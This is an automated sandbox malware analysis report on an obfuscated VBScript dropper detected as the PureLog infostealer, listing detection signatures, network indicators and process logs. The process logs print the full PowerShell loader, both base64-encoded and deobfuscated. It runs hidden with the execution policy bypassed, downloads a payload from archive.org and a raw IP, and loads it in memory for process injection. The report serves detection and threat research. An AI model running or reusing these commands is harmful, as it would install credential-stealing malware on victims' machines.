Windows Analysis Report
f4576JaIo9.vbs

Overview

General Information

Sample name: f4576JaIo9.vbs
renamed because original name is a hash value
Original sample name: 71c7461092c4a0705d5cbe43dab4757a336144a782d667fee8758ffe8380b691.vbs
Analysis ID: 1523830
MD5: 688fda516895b564b731b61a5ff25f3c
SHA1: 2ed013d46c2c403b5ec3bc344073d883015908aa
SHA256: 71c7461092c4a0705d5cbe43dab4757a336144a782d667fee8758ffe8380b691
Tags: BlindEaglevbsuser-JAMESWT_MHT
Infos:

Detection

PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
VBScript performs obfuscated calls to suspicious functions
Yara detected PureLog Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection

barindex
Source: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt Virustotal: Detection: 10% Perma Link
Source: http://172.232.189.85/2414/RNCFF.txt Virustotal: Detection: 14% Perma Link
Source: Submited Sample Integrated Neural Analysis Model: Matched 98.8% probability
Source: unknown HTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1987452573.000002669CEED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000004.00000002.1987452573.000002669CE79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000004.00000002.1988564778.000002669D0DC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1988335673.000002669CF49000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000004.00000002.1964132789.0000026695D7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1989363837.000002669D440000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000004.00000002.1987452573.000002669CE79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: omation.pdbbN$ source: powershell.exe, 00000004.00000002.1988564778.000002669D0DC000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

barindex
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: global traffic HTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1Host: ia600100.us.archive.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /2414/RNCFF.txt HTTP/1.1Host: 172.232.189.85Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /2414/RNCFF.txt HTTP/1.1Host: 172.232.189.85Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 207.241.227.240 207.241.227.240
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown TCP traffic detected without corresponding DNS query: 172.232.189.85
Source: unknown TCP traffic detected without corresponding DNS query: 172.232.189.85
Source: unknown TCP traffic detected without corresponding DNS query: 172.232.189.85
Source: unknown TCP traffic detected without corresponding DNS query: 172.232.189.85
Source: unknown TCP traffic detected without corresponding DNS query: 172.232.189.85
Source: unknown TCP traffic detected without corresponding DNS query: 172.232.189.85
Source: unknown TCP traffic detected without corresponding DNS query: 172.232.189.85
Source: unknown TCP traffic detected without corresponding DNS query: 172.232.189.85
Source: unknown TCP traffic detected without corresponding DNS query: 172.232.189.85
Source: unknown TCP traffic detected without corresponding DNS query: 172.232.189.85
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1Host: ia600100.us.archive.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /2414/RNCFF.txt HTTP/1.1Host: 172.232.189.85Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /2414/RNCFF.txt HTTP/1.1Host: 172.232.189.85Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: ia600100.us.archive.org
Source: powershell.exe, 00000004.00000002.1947344442.000002668536D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://172.232.189.85
Source: powershell.exe, 00000004.00000002.1947344442.000002668536D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://172.232.189.85(
Source: powershell.exe, 00000004.00000002.1947344442.0000026685194000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://172.232.189.85/2414/RNCFF.txt
Source: powershell.exe, 00000004.00000002.1947344442.0000026686458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ia600100.us.archive.org
Source: powershell.exe, 00000004.00000002.1964132789.0000026694DD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1947344442.0000026686810000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.1947344442.0000026684F84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1947344442.00000266864A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1999704630.00000154301E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1947344442.0000026684D61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.1947344442.00000266864A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000004.00000002.1947344442.0000026684F84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1947344442.00000266864A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1999704630.000001543016B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000002.00000002.1999704630.00000154301BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1947344442.0000026684D61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.1947344442.0000026686810000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.1947344442.0000026686810000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.1947344442.0000026686810000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.1947344442.0000026684F84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1947344442.00000266864A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.1947344442.00000266857E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.1947344442.00000266861E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ia600100.us.arX
Source: powershell.exe, 00000004.00000002.1947344442.0000026684F84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1947344442.00000266861E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ia600100.us.archive.org
Source: powershell.exe, 00000004.00000002.1947344442.0000026684F84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1947344442.00000266861E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
Source: powershell.exe, 00000004.00000002.1947344442.0000026684F84000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt7uX;Znibase64Content
Source: powershell.exe, 00000004.00000002.1964132789.0000026694DD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1947344442.0000026686810000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.1947344442.00000266864A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000004.00000002.1947344442.00000266864A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown HTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.8:49704 version: TLS 1.2

System Summary

barindex
Source: Process Memory Space: powershell.exe PID: 2852, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5708, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnWicrJ25pdScrJ3JsJysnID0gN3VYaHR0JysncHM6Ly9pYTYnKycwJysnMDEnKycwJysnMCcrJy51cy4nKydhJysncmMnKydoaXYnKydlLm9yZy8nKycyNC9pdGVtcy9kJysnZScrJ3RhaCcrJy1ub3RlJysnLXYvRGUnKyd0YWhOb3RlVi4nKyd0eCcrJ3Q3JysndVgnKyc7JysnWicrJ25pYmFzJysnZTY0JysnQ29uJysndCcrJ2VudCA9IChOZXctT2InKydqZWN0IFN5Jysnc3RlJysnbScrJy4nKydOJysnZScrJ3QuV2ViQycrJ2wnKydpZW50JysnKS5EbycrJ3cnKyduJysnbG9hZFN0JysncmluZyhaJysnbicrJ2l1cmwpJysnO1puaScrJ2JpbmFyeUMnKydvbicrJ3RlbnQnKycgJysnPSBbUycrJ3lzdGUnKydtLkMnKydvJysnbnZlcicrJ3RdOjpGcicrJ29tQmFzZTY0U3RyaScrJ24nKydnKFpuaWJhc2U2JysnNENvbnQnKydlJysnbicrJ3QnKycpOycrJ1puaWEnKydzc2VtYmwnKyd5ICcrJz0gW1JlZmwnKydlY3QnKydpb24nKycuQXNzZScrJ20nKydibHldJysnOjpMJysnb2FkJysnKCcrJ1onKyduaWJpJysnbmFyeUNvbicrJ3QnKydlJysnbnQpO1onKyduJysnaXR5cGUgJysnPScrJyBaJysnbmlhc3NlbWInKydseS5HZXRUeXBlKDd1WCcrJ1InKyd1JysnblBFLkgnKydvJysnbWU3JysndVgnKycpOycrJ1puaW1lJysndGgnKydvZCcrJyAnKyc9IFonKyduJysnaXR5cGUuJysnRycrJ2UnKyd0TWV0JysnaCcrJ29kJysnKDd1WCcrJ1YnKydBSTd1JysnWCk7WicrJ25pbWV0aG8nKydkLkknKydudm9rZSgnKydabicrJ2knKyduJysndWxsLCcrJyAnKydbJysnb2JqZWMnKyd0W11dJysnQCcrJyg3dVh0eHQuRicrJ0ZDTlIvNDEnKyc0Mi81OC45OCcrJzEuMicrJzMnKycyLjI3MScrJy8nKycvJysnOnB0dGgnKyc3JysndVggJysnLCA3dVhkZXNhdGl2YScrJ2RvNycrJ3VYICcrJywgN3UnKydYZGVzJysnYScrJ3RpJysndmEnKydkbzd1WCAsJysnIDd1WCcrJ2QnKydlc2F0aXZhZG83dVgsNycrJ3VYUicrJ2VnQScrJ3NtNycrJ3VYJysnLDd1WDcnKyd1WCkpJyktUkVwbGFDZSAoW0NoQXJdNTUrW0NoQXJdMTE3K1tDaEFyXTg4KSxbQ2hBcl0zOSAtUkVwbGFDZSdabmknLFtDaEFyXTM2KSB8LiAoICRlTlY6Y09tU1BlQ1s0LDI0LDI1XS1qb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnWicrJ25pdScrJ3JsJysnID0gN3VYaHR0JysncHM6Ly9pYTYnKycwJysnMDEnKycwJysnMCcrJy51cy4nKydhJysncmMnKydoaXYnKydlLm9yZy8nKycyNC9pdGVtcy9kJysnZScrJ3RhaCcrJy1ub3RlJysnLXYvRGUnKyd0YWhOb3RlVi4nKyd0eCcrJ3Q3JysndVgnKyc7JysnWicrJ25pYmFzJysnZTY0JysnQ29uJysndCcrJ2VudCA9IChOZXctT2InKydqZWN0IFN5Jysnc3RlJysnbScrJy4nKydOJysnZScrJ3QuV2ViQycrJ2wnKydpZW50JysnKS5EbycrJ3cnKyduJysnbG9hZFN0JysncmluZyhaJysnbicrJ2l1cmwpJysnO1puaScrJ2JpbmFyeUMnKydvbicrJ3RlbnQnKycgJysnPSBbUycrJ3lzdGUnKydtLkMnKydvJysnbnZlcicrJ3RdOjpGcicrJ29tQmFzZTY0U3RyaScrJ24nKydnKFpuaWJhc2U2JysnNENvbnQnKydlJysnbicrJ3QnKycpOycrJ1puaWEnKydzc2VtYmwnKyd5ICcrJz0gW1JlZmwnKydlY3QnKydpb24nKycuQXNzZScrJ20nKydibHldJysnOjpMJysnb2FkJysnKCcrJ1onKyduaWJpJysnbmFyeUNvbicrJ3QnKydlJysnbnQpO1onKyduJysnaXR5cGUgJysnPScrJyBaJysnbmlhc3NlbWInKydseS5HZXRUeXBlKDd1WCcrJ1InKyd1JysnblBFLkgnKydvJysnbWU3JysndVgnKycpOycrJ1puaW1lJysndGgnKydvZCcrJyAnKyc9IFonKyduJysnaXR5cGUuJysnRycrJ2UnKyd0TWV0JysnaCcrJ29kJysnKDd1WCcrJ1YnKydBSTd1JysnWCk7WicrJ25pbWV0aG8nKydkLkknKydudm9rZSgnKydabicrJ2knKyduJysndWxsLCcrJyAnKydbJysnb2JqZWMnKyd0W11dJysnQCcrJyg3dVh0eHQuRicrJ0ZDTlIvNDEnKyc0Mi81OC45OCcrJzEuMicrJzMnKycyLjI3MScrJy8nKycvJysnOnB0dGgnKyc3JysndVggJysnLCA3dVhkZXNhdGl2YScrJ2RvNycrJ3VYICcrJywgN3UnKydYZGVzJysnYScrJ3RpJysndmEnKydkbzd1WCAsJysnIDd1WCcrJ2QnKydlc2F0aXZhZG83dVgsNycrJ3VYUicrJ2VnQScrJ3NtNycrJ3VYJysnLDd1WDcnKyd1WCkpJyktUkVwbGFDZSAoW0NoQXJdNTUrW0NoQXJdMTE3K1tDaEFyXTg4KSxbQ2hBcl0zOSAtUkVwbGFDZSdabmknLFtDaEFyXTM2KSB8LiAoICRlTlY6Y09tU1BlQ1s0LDI0LDI1XS1qb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Source: f4576JaIo9.vbs Initial sample: Strings found which are bigger than 50
Source: Process Memory Space: powershell.exe PID: 2852, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5708, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.expl.evad.winVBS@6/6@1/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7016:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cwprilqk.x4c.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\f4576JaIo9.vbs"
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\f4576JaIo9.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnWicrJ25pdScrJ3JsJysnID0gN3VYaHR0JysncHM6Ly9pYTYnKycwJysnMDEnKycwJysnMCcrJy51cy4nKydhJysncmMnKydoaXYnKydlLm9yZy8nKycyNC9pdGVtcy9kJysnZScrJ3RhaCcrJy1ub3RlJysnLXYvRGUnKyd0YWhOb3RlVi4nKyd0eCcrJ3Q3JysndVgnKyc7JysnWicrJ25pYmFzJysnZTY0JysnQ29uJysndCcrJ2VudCA9IChOZXctT2InKydqZWN0IFN5Jysnc3RlJysnbScrJy4nKydOJysnZScrJ3QuV2ViQycrJ2wnKydpZW50JysnKS5EbycrJ3cnKyduJysnbG9hZFN0JysncmluZyhaJysnbicrJ2l1cmwpJysnO1puaScrJ2JpbmFyeUMnKydvbicrJ3RlbnQnKycgJysnPSBbUycrJ3lzdGUnKydtLkMnKydvJysnbnZlcicrJ3RdOjpGcicrJ29tQmFzZTY0U3RyaScrJ24nKydnKFpuaWJhc2U2JysnNENvbnQnKydlJysnbicrJ3QnKycpOycrJ1puaWEnKydzc2VtYmwnKyd5ICcrJz0gW1JlZmwnKydlY3QnKydpb24nKycuQXNzZScrJ20nKydibHldJysnOjpMJysnb2FkJysnKCcrJ1onKyduaWJpJysnbmFyeUNvbicrJ3QnKydlJysnbnQpO1onKyduJysnaXR5cGUgJysnPScrJyBaJysnbmlhc3NlbWInKydseS5HZXRUeXBlKDd1WCcrJ1InKyd1JysnblBFLkgnKydvJysnbWU3JysndVgnKycpOycrJ1puaW1lJysndGgnKydvZCcrJyAnKyc9IFonKyduJysnaXR5cGUuJysnRycrJ2UnKyd0TWV0JysnaCcrJ29kJysnKDd1WCcrJ1YnKydBSTd1JysnWCk7WicrJ25pbWV0aG8nKydkLkknKydudm9rZSgnKydabicrJ2knKyduJysndWxsLCcrJyAnKydbJysnb2JqZWMnKyd0W11dJysnQCcrJyg3dVh0eHQuRicrJ0ZDTlIvNDEnKyc0Mi81OC45OCcrJzEuMicrJzMnKycyLjI3MScrJy8nKycvJysnOnB0dGgnKyc3JysndVggJysnLCA3dVhkZXNhdGl2YScrJ2RvNycrJ3VYICcrJywgN3UnKydYZGVzJysnYScrJ3RpJysndmEnKydkbzd1WCAsJysnIDd1WCcrJ2QnKydlc2F0aXZhZG83dVgsNycrJ3VYUicrJ2VnQScrJ3NtNycrJ3VYJysnLDd1WDcnKyd1WCkpJyktUkVwbGFDZSAoW0NoQXJdNTUrW0NoQXJdMTE3K1tDaEFyXTg4KSxbQ2hBcl0zOSAtUkVwbGFDZSdabmknLFtDaEFyXTM2KSB8LiAoICRlTlY6Y09tU1BlQ1s0LDI0LDI1XS1qb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('Z'+'niu'+'rl'+' = 7uXhtt'+'ps://ia6'+'0'+'01'+'0'+'0'+'.us.'+'a'+'rc'+'hiv'+'e.org/'+'24/items/d'+'e'+'tah'+'-note'+'-v/De'+'tahNoteV.'+'tx'+'t7'+'uX'+';'+'Z'+'nibas'+'e64'+'Con'+'t'+'ent = (New-Ob'+'ject Sy'+'ste'+'m'+'.'+'N'+'e'+'t.WebC'+'l'+'ient'+').Do'+'w'+'n'+'loadSt'+'ring(Z'+'n'+'iurl)'+';Zni'+'binaryC'+'on'+'tent'+' '+'= [S'+'yste'+'m.C'+'o'+'nver'+'t]::Fr'+'omBase64Stri'+'n'+'g(Znibase6'+'4Cont'+'e'+'n'+'t'+');'+'Znia'+'ssembl'+'y '+'= [Refl'+'ect'+'ion'+'.Asse'+'m'+'bly]'+'::L'+'oad'+'('+'Z'+'nibi'+'naryCon'+'t'+'e'+'nt);Z'+'n'+'itype '+'='+' Z'+'niassemb'+'ly.GetType(7uX'+'R'+'u'+'nPE.H'+'o'+'me7'+'uX'+');'+'Znime'+'th'+'od'+' '+'= Z'+'n'+'itype.'+'G'+'e'+'tMet'+'h'+'od'+'(7uX'+'V'+'AI7u'+'X);Z'+'nimetho'+'d.I'+'nvoke('+'Zn'+'i'+'n'+'ull,'+' '+'['+'objec'+'t[]]'+'@'+'(7uXtxt.F'+'FCNR/41'+'42/58.98'+'1.2'+'3'+'2.271'+'/'+'/'+':ptth'+'7'+'uX '+', 7uXdesativa'+'do7'+'uX '+', 7u'+'Xdes'+'a'+'ti'+'va'+'do7uX ,'+' 7uX'+'d'+'esativado7uX,7'+'uXR'+'egA'+'sm7'+'uX'+',7uX7'+'uX))')-REplaCe ([ChAr]55+[ChAr]117+[ChAr]88),[ChAr]39 -REplaCe'Zni',[ChAr]36) |. ( $eNV:cOmSPeC[4,24,25]-joiN'')"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnWicrJ25pdScrJ3JsJysnID0gN3VYaHR0JysncHM6Ly9pYTYnKycwJysnMDEnKycwJysnMCcrJy51cy4nKydhJysncmMnKydoaXYnKydlLm9yZy8nKycyNC9pdGVtcy9kJysnZScrJ3RhaCcrJy1ub3RlJysnLXYvRGUnKyd0YWhOb3RlVi4nKyd0eCcrJ3Q3JysndVgnKyc7JysnWicrJ25pYmFzJysnZTY0JysnQ29uJysndCcrJ2VudCA9IChOZXctT2InKydqZWN0IFN5Jysnc3RlJysnbScrJy4nKydOJysnZScrJ3QuV2ViQycrJ2wnKydpZW50JysnKS5EbycrJ3cnKyduJysnbG9hZFN0JysncmluZyhaJysnbicrJ2l1cmwpJysnO1puaScrJ2JpbmFyeUMnKydvbicrJ3RlbnQnKycgJysnPSBbUycrJ3lzdGUnKydtLkMnKydvJysnbnZlcicrJ3RdOjpGcicrJ29tQmFzZTY0U3RyaScrJ24nKydnKFpuaWJhc2U2JysnNENvbnQnKydlJysnbicrJ3QnKycpOycrJ1puaWEnKydzc2VtYmwnKyd5ICcrJz0gW1JlZmwnKydlY3QnKydpb24nKycuQXNzZScrJ20nKydibHldJysnOjpMJysnb2FkJysnKCcrJ1onKyduaWJpJysnbmFyeUNvbicrJ3QnKydlJysnbnQpO1onKyduJysnaXR5cGUgJysnPScrJyBaJysnbmlhc3NlbWInKydseS5HZXRUeXBlKDd1WCcrJ1InKyd1JysnblBFLkgnKydvJysnbWU3JysndVgnKycpOycrJ1puaW1lJysndGgnKydvZCcrJyAnKyc9IFonKyduJysnaXR5cGUuJysnRycrJ2UnKyd0TWV0JysnaCcrJ29kJysnKDd1WCcrJ1YnKydBSTd1JysnWCk7WicrJ25pbWV0aG8nKydkLkknKydudm9rZSgnKydabicrJ2knKyduJysndWxsLCcrJyAnKydbJysnb2JqZWMnKyd0W11dJysnQCcrJyg3dVh0eHQuRicrJ0ZDTlIvNDEnKyc0Mi81OC45OCcrJzEuMicrJzMnKycyLjI3MScrJy8nKycvJysnOnB0dGgnKyc3JysndVggJysnLCA3dVhkZXNhdGl2YScrJ2RvNycrJ3VYICcrJywgN3UnKydYZGVzJysnYScrJ3RpJysndmEnKydkbzd1WCAsJysnIDd1WCcrJ2QnKydlc2F0aXZhZG83dVgsNycrJ3VYUicrJ2VnQScrJ3NtNycrJ3VYJysnLDd1WDcnKyd1WCkpJyktUkVwbGFDZSAoW0NoQXJdNTUrW0NoQXJdMTE3K1tDaEFyXTg4KSxbQ2hBcl0zOSAtUkVwbGFDZSdabmknLFtDaEFyXTM2KSB8LiAoICRlTlY6Y09tU1BlQ1s0LDI0LDI1XS1qb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('Z'+'niu'+'rl'+' = 7uXhtt'+'ps://ia6'+'0'+'01'+'0'+'0'+'.us.'+'a'+'rc'+'hiv'+'e.org/'+'24/items/d'+'e'+'tah'+'-note'+'-v/De'+'tahNoteV.'+'tx'+'t7'+'uX'+';'+'Z'+'nibas'+'e64'+'Con'+'t'+'ent = (New-Ob'+'ject Sy'+'ste'+'m'+'.'+'N'+'e'+'t.WebC'+'l'+'ient'+').Do'+'w'+'n'+'loadSt'+'ring(Z'+'n'+'iurl)'+';Zni'+'binaryC'+'on'+'tent'+' '+'= [S'+'yste'+'m.C'+'o'+'nver'+'t]::Fr'+'omBase64Stri'+'n'+'g(Znibase6'+'4Cont'+'e'+'n'+'t'+');'+'Znia'+'ssembl'+'y '+'= [Refl'+'ect'+'ion'+'.Asse'+'m'+'bly]'+'::L'+'oad'+'('+'Z'+'nibi'+'naryCon'+'t'+'e'+'nt);Z'+'n'+'itype '+'='+' Z'+'niassemb'+'ly.GetType(7uX'+'R'+'u'+'nPE.H'+'o'+'me7'+'uX'+');'+'Znime'+'th'+'od'+' '+'= Z'+'n'+'itype.'+'G'+'e'+'tMet'+'h'+'od'+'(7uX'+'V'+'AI7u'+'X);Z'+'nimetho'+'d.I'+'nvoke('+'Zn'+'i'+'n'+'ull,'+' '+'['+'objec'+'t[]]'+'@'+'(7uXtxt.F'+'FCNR/41'+'42/58.98'+'1.2'+'3'+'2.271'+'/'+'/'+':ptth'+'7'+'uX '+', 7uXdesativa'+'do7'+'uX '+', 7u'+'Xdes'+'a'+'ti'+'va'+'do7uX ,'+' 7uX'+'d'+'esativado7uX,7'+'uXR'+'egA'+'sm7'+'uX'+',7uX7'+'uX))')-REplaCe ([ChAr]55+[ChAr]117+[ChAr]88),[ChAr]39 -REplaCe'Zni',[ChAr]36) |. ( $eNV:cOmSPeC[4,24,25]-joiN'')" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
